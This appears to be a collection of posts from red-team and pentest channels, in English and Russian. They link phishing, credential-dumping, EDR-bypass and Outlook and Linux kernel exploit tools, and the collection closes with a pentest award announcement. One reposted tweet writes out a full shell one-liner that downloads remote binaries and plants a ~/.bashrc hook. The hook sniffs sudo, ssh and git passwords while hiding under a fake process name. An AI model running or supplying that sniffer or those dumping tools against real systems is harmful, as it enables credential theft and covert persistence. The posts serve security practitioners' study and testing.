⛓ Trusted Domain, Hidden Danger

In this blog post describes a prevalent tactic used in phishing attacks, which involves exploiting legitimate platforms for redirection through deceptive links.

Source:
🔗 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trusted-domain-hidden-danger-deceptive-url-redirections-in-email-phishing-attacks/

#phishing #url #redirect

Набор инструментов для удалённого дампа паролей.

https://github.com/Slowerzs/ThievingFox/

Ну и сам блог:
https://blog.slowerzs.net/posts/thievingfox/

#pentest #redteam #creds

⚙️ Introduction to Bypassing Hooks EDR

The article explores methods of bypassing EDR hooks in the user mode of the Windows operating system, starting with an explanation of system calls and their role in transitioning between user and kernel modes. Subsequently, various techniques for bypassing hooks are discussed, including direct and indirect syscalls, along with their advantages and potential limitations when used for evading protective mechanisms.

🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html

#maldev #edr #hooks #syscalls

⚙️ MultiDump

This is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly. MultiDump supports LSASS dump via ProcDump.exe or Comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis

🔗 https://github.com/Xre0uS/MultiDump

#lsass #remote #cpp #python

🔑 I Know What Your Password Was Last Summer...

This is a blog post about password analysis and some research regarding frequently hacked NTLM passwords.

🔗 https://labs.lares.com/password-analysis/

#bruteforce #hashcat #ntlm

Теперь можно извлекать учетные данные без обращения к диску (Dumping credentials without touching disk) с помощью утилиты #go-secdump которая поддерживает и SOCKS Proxy решая проблему #Impacket

https://github.com/jfjallid/go-secdump

скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698

CVE-2024-21413: Microsoft Outlook Leak Hash

https://github.com/duy-31/CVE-2024-21413

#exploit #pentest #redteam #ad

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC

📜 Description
This script presents a proof of concept (PoC) for CVE-2024-21413, a significant security vulnerability discovered in Microsoft Outlook with a CVSS of 9.8. Termed the #MonikerLink bug, this vulnerability has far-reaching implications, including the potential leakage of local NTLM information and the possibility of remote code execution. Moreover, it highlights an attack vector that could bypass Office Protected View, thereby extending its threat to other Office applications.

Материал про пентест 1С

🎁 Source Code Disclosure in IIS 10.0! Almost.

There is a method to reveal the source code of some .NET apps. Here's how it works.

👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/

CVE-2024-1086 Linux kernel LPE

Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.

A full write-up of the exploit - including background information and loads of useful diagrams - can be found in the Flipping Pages blogpost.

Evilginx ❤️ Gophish

The highly anticipated official integration between Evilginx and Gophish has been unveiled in the latest Evilginx 3.3 update. Alongside this major feature, the update brings numerous quality-of-life enhancements.

🔗 https://breakdev.org/evilginx-3-3-go-phish/

#evilginx #gophish #phishing

CVE-2024-21338

LPE from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.

Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/

Ой, красота))) Получить данные из LSA без дампа LSASS.

Tool: https://github.com/EvanMcBroom/lsa-whisperer

Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b

#redteam #pentest #creds #dump

😈 [ The Hacker's Choice (@[email protected]) @hackerschoice ]

A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'

🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking

🐥 [ tweet ]

прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger

🏆 Pentest Award: Ежегодная независимая премия для пентестеров

Команда Awillix объявила о начале приема заявок на ежегодную премию — Pentest Award.

Это отличная возможность выразить свои достижения и продемонстрировать вклад в ИБ сообщество, а также поделиться лучшими практическими историями.

В этот раз будет 6 номинаций, по три призовых места в каждой:

— Пробив WEB;
— Пробив инфраструктуры;
— Девайс;
— Hack the logic;
— Раз bypass, два bypass;
— Ловись рыбка.

Главный приз — тяжеленная стеклянная именная статуэтка, которую, к слову, в прошлом году выиграл мой дорогой snovvcrash за первое место.

И, конечно, не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также другие бесценные подарки от BI.ZONE Bug Bounty и VK Bug Bounty.

#pentestaward